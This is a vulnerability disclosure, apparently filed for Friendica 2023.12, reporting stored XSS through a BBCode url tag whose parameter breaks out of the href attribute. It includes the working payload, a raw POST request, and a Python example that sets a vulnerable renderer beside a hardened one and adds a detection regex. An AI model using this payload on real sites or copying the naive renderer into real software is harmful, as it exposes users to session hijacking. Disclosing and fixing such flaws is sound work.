I found a vulnerability issue while testing Friendica locally. The vulnerability allows injecting a payload into a comment using BBCode tags, causing a stored XSS affecting all the users that can read the comment.
Vulnerability Description
The vulnerability allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.
Steps to reproduce
Login to the application.
Create a new post.
Add a comment to the post with the following content: [url=http://www.example.com" onmouseover="alert('XSS')]text[/url]
Hover the mouse on the comment.
Observe the payload being triggered.
Proof of Concept
The request:
POST /item HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 160
Origin: http://localhost
Connection: close
Referer: http://localhost/profile/snajafov
Cookie: flash=no; _ga=GA1.1.912797092.1706817399; _ga_98KMNYED26=GS1.1.1706821804.4.0.1706821804.0.0.0; PHPSESSID=798fd11033df12e4df9d01086fbf993e
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
profile_uid=2&parent=52&jsreload=&post_id_random=330671535643&body=%5Burl%3Dhttp%3A%2F%2Fwww.example.com%22+onmouseover%3D%22alert('Comment')%5Dtext%5B%2Furl%5D
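The following is an added illustration, not Friendica's own BBCode renderer: a minimal `[url=...]` to `<a>` converter in the naive form that reproduces the injection above, next to a hardened form that validates the URL and escapes the attribute value. The function names, the regular expression and the sample inputs are all constructed for this example; the first sample is the payload from the report.

```python
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# Constructed sample inputs: the first is the payload from the report above.
PAYLOAD = "[url=http://www.example.com\" onmouseover=\"alert('XSS')]text[/url]"
BENIGN = "[url=https://example.org/a?b=1&c=2]site[/url]"
JS_SCHEME = "[url=javascript:alert(1)]click[/url]"

# Matches a [url=...]label[/url] pair; non-greedy so it stops at the first closing bracket.
URL_TAG = re.compile(r"\[url=(.+?)\](.*?)\[/url\]", re.DOTALL)


def render_naive(bbcode: str) -> str:
    """Vulnerable conversion: the tag parameter is copied verbatim into the href attribute.
    A parameter containing a double quote closes the attribute, and everything after it
    becomes a new attribute on the <a> element."""
    return URL_TAG.sub(r'<a href="\1">\2</a>', bbcode)


def safe_href(raw: str) -> Optional[str]:
    """Return the URL if it is acceptable as an href, otherwise None.
    Rejects characters that never appear unencoded in a valid URL (quotes, angle
    brackets, whitespace) and any scheme other than http/https, so javascript:
    and data: URLs never reach the DOM either."""
    candidate = raw.strip()
    if any(c in candidate for c in "\"'<> \t\r\n"):
        return None
    parts = urlsplit(candidate)
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return None
    return candidate


def render_safe(bbcode: str) -> str:
    """Hardened conversion: validate the URL, then HTML-escape both the attribute
    value and the link text. If the URL is rejected, the visible text is kept and
    the link is dropped."""
    def repl(m: re.Match) -> str:
        href = safe_href(m.group(1))
        text = html.escape(m.group(2), quote=True)
        if href is None:
            return text
        return f'<a href="{html.escape(href, quote=True)}" rel="nofollow noopener">{text}</a>'
    return URL_TAG.sub(repl, bbcode)


# Any tag carrying an on* event attribute; useful as a regression check on rendered output.
INLINE_HANDLER = re.compile(r"<[^>]*\son[a-z]+\s*=", re.IGNORECASE)


def has_inline_handler(rendered: str) -> bool:
    """True if the rendered HTML contains an inline event handler attribute."""
    return INLINE_HANDLER.search(rendered) is not None


if __name__ == "__main__":
    for sample in (PAYLOAD, BENIGN, JS_SCHEME):
        print("naive:", render_naive(sample))
        print("safe: ", render_safe(sample))
```

Run on the report's payload, `render_naive` emits an anchor with an `onmouseover` attribute, which is exactly what the steps above trigger on hover; `render_safe` rejects the parameter because it contains a quote and a space and emits only the text `text`. The `has_inline_handler` check is the kind of assertion a unit test for the real renderer can carry so the regression from the older BBCode issue mentioned below does not come back.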
A similar issue with possible injection using BBCode tags was solved back in the day. Currently the payload present in that issue is not executed; however, it seems like it's still possible to cause an injection using a different approach, as described here.
I also opened a similar issue about XSS vulnerability in post content.
This is Friendica, version 2023.12 that is running at the web location http://localhost. The database version is 1542/1542, the post update version is 1507/1507.
Apache version: Apache/2.4.56
PHP version: PHP/8.1.27
DB version: 11.2.2-MariaDB
References
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CAPEC-592: Stored XSS
Stored XSS
Cross Site Scripting Prevention Cheat Sheet